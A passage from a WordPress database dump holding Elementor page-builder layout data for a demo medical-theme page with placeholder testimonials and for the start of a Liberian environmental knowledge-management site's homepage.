center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ffe3375\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"deb0197\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient #4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3095,399,'_elementor_version','2.7.5'),(3096,399,'_elementor_template_type','wp-page'),(3100,400,'_wp_page_template','default'),(3101,400,'_elementor_edit_mode','builder'),(3102,400,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3a3bcf4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"756a496\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis 